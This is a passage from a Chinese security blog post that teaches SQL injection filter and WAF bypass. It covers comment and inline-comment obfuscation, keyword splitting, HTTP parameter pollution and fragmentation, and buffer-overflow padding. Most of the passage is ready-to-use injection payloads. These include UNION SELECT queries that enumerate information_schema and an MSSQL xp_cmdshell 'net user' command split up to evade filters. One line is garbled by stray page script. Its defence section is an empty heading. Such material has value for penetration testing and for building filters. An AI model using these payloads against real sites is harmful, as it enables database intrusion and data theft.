<p>常见的编码当然还有二进制、八进制，它们不一定都派得上用场，但后面会提到使用二进制的例子。<br>(4).使用注释<br>1.看一下常见的用于注释的符号有哪些<br><code>//, -- , /**/, #, --+,--  -, ;--a</code><br>2.内联注释<br>相比普通注释内联注释用的更多/!content/只有MySQL会正常识别content的内容<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3 </span><br><span class="line">?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4…</span><br></pre></td></tr></table></figure></p>
<p>(5).等价函数<br>1.函数与变量<br>不再赘述<br>2.符号<br>不再赘述<br>3.生僻函数<br>和上文中其他非常规方法进行注入所用函数一样，故不再赘述<br><strong>(6).特殊符号</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1.使用反引号`，例如select `version()`，可以用来过空格和正则，特殊情况下还可以将其做注释符用</span><br><span class="line">2.神奇的&quot;-+.&quot;，select+id-1+1.from users; “+”是用于字符串连接的，”-”和”.”在此也用于连接，可以逃过空格和关键字过滤</span><br><span class="line">3.@符号，select@^1.from users; @用于变量定义如@var/* &lt;![CDATA[ */!function(t,e,r,n,c,a,p)&#123;try&#123;t=document.currentScript||function()&#123;for(t=document.getElementsByTagName(&apos;script&apos;),e=t.length;e--;)if(t[e].getAttribute(&apos;data-cfhash&apos;))return t[e]&#125;();if(t&amp;&amp;(c=t.previousSibling))&#123;p=t.parentNode;if(a=c.getAttribute(&apos;data-cfemail&apos;))&#123;for(e=&apos;&apos;,r=&apos;0x&apos;+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+=&apos;%&apos;+(&apos;0&apos;+(&apos;0x&apos;+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)&#125;p.removeChild(t)&#125;&#125;catch(u)&#123;&#125;&#125;()/* ]]&gt; */_name，一个@表示用户定义，@@表示系统变量</span><br><span class="line">4.Mysql function() as xxx  也可不用as和空格　　 select-count(id)test from users;  //绕过空格限制</span><br></pre></td></tr></table></figure></p>
<p>特殊符号灵活运用，威力无穷<br>一些栗子:<br>`、~、!、@、%、()、[]、.、-、+ 、|、%00<br><strong>关键字拆分</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&apos;se&apos;+&apos;lec&apos;+&apos;t&apos;</span><br><span class="line">%S%E%L%E%C%T 1</span><br><span class="line">1.aspx?id=1;EXEC(&apos;ma&apos;+&apos;ster..x&apos;+&apos;p_cm&apos;+&apos;dsh&apos;+&apos;ell &quot;net user&quot;&apos;)</span><br></pre></td></tr></table></figure></p>
<p>!和()’ or –+2=- -!!!’2<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure></p>
<p>id=1+(UnI)(oN)+(SeL)(EcT)<br>//有看到说Access中,”[]”用于表和列,”()”用于数值也可以做分隔<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">本节最后再给出一些和这些字符多少有点关系的操作符供参考</span><br></pre></td></tr></table></figure></p>
<blockquote>
<p>,&lt;&lt;, &gt;=, &lt;=, &lt;&gt;,&lt;=&gt;,&gt;,XOR, DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN<br>使用这些”特殊符号”实现绕过是一件很细微的事情一方面各数据库对符号的处理是不尽相同的另一方面你得充分了解这些符号的特性和使用方法才能会考虑利用其实现绕过<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">(7).HTTP参数控制</span><br><span class="line">1.HPP参数污染(HTTP Parameter Polution)</span><br></pre></td></tr></table></figure></p>
</blockquote>
<p>/?id=1;select+1&amp;id=2,3+from+users+where+id=1—<br>/?id=1/*<em>/union/</em>&amp;id=<em>/select/</em>&amp;id=<em>/pwd/</em>&amp;id=<em>/from/</em>&amp;id=*/users<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">![injection](./SQL injection/3.jpg)</span><br><span class="line">不再赘述</span><br><span class="line"></span><br><span class="line">2.HPF(HTTP Parameter Fragment)</span><br></pre></td></tr></table></figure></p>
<p>/?a=1+union/<em>&amp;b=</em>/select+1,pass/<em>&amp;c=</em>/from+users–<br>select <em> from table where a=1 union/</em> and b=<em>/select 1,pass/</em> limit */from users—<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">看完上面两个示例发现和HPP最后一个示例很像不同之处在于参数不一样这里是在不同的参数之间进行分割结果到了数据库执行查询时再合并语句。</span><br><span class="line"></span><br><span class="line">3.HPC(HTTP Parameter Contamination)</span><br><span class="line">RFC2396定义了如下一些字符</span><br><span class="line"></span><br><span class="line">Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * &apos; ()  </span><br><span class="line">Reserved : ; / ? : @ &amp; = + $ ,  </span><br><span class="line">Unwise : &#123; &#125; | \ ^ [ ] `</span><br><span class="line">不同的Web服务器处理处理构造得特殊请求时有不同的逻辑</span><br><span class="line"></span><br><span class="line">![injection](./SQL injection/4.jpg)</span><br><span class="line"></span><br><span class="line">(8).缓冲区溢出</span><br><span class="line">缓冲区溢出用于对付WAF在内的软件，其本身有不少WAF是C语言写的，而C语言自身没有缓冲区保护机制。因此如果WAF在处理测试向量时超出了其缓冲区长度就会引发bug，从而实现绕过</span><br><span class="line">栗子</span><br></pre></td></tr></table></figure></p>
<p>?id=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">示例0xA*1000指0xA后面”A&quot;重复1000次一般来说对应用软件构成缓冲区溢出都需要较大的测试长度这里1000只做参考也许在有些情况下可能不需要这么长也能溢出</span><br><span class="line">意为重复1000次绕过WAF从而使得后面的查询语句不会被过滤而得到执行</span><br><span class="line"></span><br><span class="line">(9).整合绕过</span><br><span class="line">结合使用前面谈到的各种绕过技术单一的技术可能无法绕过过滤机制但是多种技术的配合使用成功的可能性就会增加不少了。这一方面来说关系到总体与局部和另一方面则是多种技术的使用创造了更多的可能性组合除非每一种技术单独都无法使用否则它们能产生比自身大得多的能量。</span><br><span class="line">栗子:</span><br></pre></td></tr></table></figure></p>
<p>z.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 “A”)..])+/<em>!uNIOn</em>/+/<em>!SeLECt</em>/+1,2,3,4…<br>id=1/<em>!UnIoN</em>/+SeLeCT+1,2,concat(/<em>!table_name</em>/)+FrOM /<em>information_schema</em>/.tables /<em>!WHERE </em>/+/<em>!TaBlE_ScHeMa</em>/+like+database()– -<br>?id=-725+/<em>!UNION</em>/+/<em>!SELECT</em>/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/<em>!INFORMATION_SCHEM</em>/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e–<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">从前面到现在基本上每条注入语句中都有数字如果某查询的数据类型为字符串、或者做了严格限制数字要被和谐掉这就有点棘手了不过办法总是有的</span><br><span class="line">即**利用数据库中预定义的数字变量进行bypass**</span><br><span class="line">![injection](./SQL injection/5.jpg)</span><br><span class="line">![injection](./SQL injection/6.jpg)</span><br><span class="line">上面两张图第一张是不能使用数字时通过使用数学函数得到某个数字的值第二张则是这些数字对应的36进制的值因此有时候一个很简单的表达式可能会很复杂或者非常长其实际就是计算mod(a,b)</span><br><span class="line"></span><br><span class="line">```(mod(length(trim(leading(concat(lower(conv(version()*(true+pi()),pi()*pi(),pow(pi(),pi()))),lower(conv(pi()*pi()*pi()-pi()-pi(),pi()*pi(), pow(pi(),pi()))),lower(conv(pi()*version(),pi()*pi(),pow(pi(),pi()))),conv(version()*(true+pi()),pi()*pi(),pow(pi(),pi())),lower(conv(pi()*pi()*pi()-pi()-pi(),pi()*pi(),pow(pi(),pi()))),lower(conv(pi()*version(),pi()*pi(),pow(pi(),pi()))),lower(conv(ceil(pi()*version())+true,pi()*pi(),pow(pi(), pi()))),lower(conv(ceil((pi()+ceil(pi()))*pi()),pi()*pi(),pow(pi(),pi()))),lower(conv(ceil(pi())*ceil(pi()+pi()),pi()*pi(),pow(pi(),pi()))),conv(ceil(pi()*version()),pi()*pi(),pow(pi(),pi())),lower(conv(ceil(pi()*pi()+pi()),pi()*pi(),pow(pi(),pi()))),lower(conv(ceil(version()*version()),pi()*pi(),pow(pi(),pi()))),lower(conv(ceil(pi()*pi()+pi()),pi()*pi(),pow(pi(),pi())))))from(pass))),length(pass))</span><br></pre></td></tr></table></figure></p>
<p><strong>0x16 防御方法</strong></p>
<p><strong>0x17 几个脚本</strong></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/injection/" rel="tag"># injection</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/05/13/对于XXE的学习/" rel="next" title="对于XXE的学习">
                <i class="fa fa-chevron-left"></i> 对于XXE的学习
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Ratten3anger</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">Artikel</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">Tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://Hu3sky.github.io" title="Hu3sky" target="_blank">Hu3sky</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://patrilic.github.io" title="Patrilic" target="_blank">Patrilic</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://we.cuit.site" title="Act0r" target="_blank">Act0r</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://zoniony.github.io" title="Zoniony" target="_blank">Zoniony</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://sa1tfish.site" title="Ph3mf0lk" target="_blank">Ph3mf0lk</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ratten3anger</span>

  
</div>


  <div class="powered-by">Erstellt mit  <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
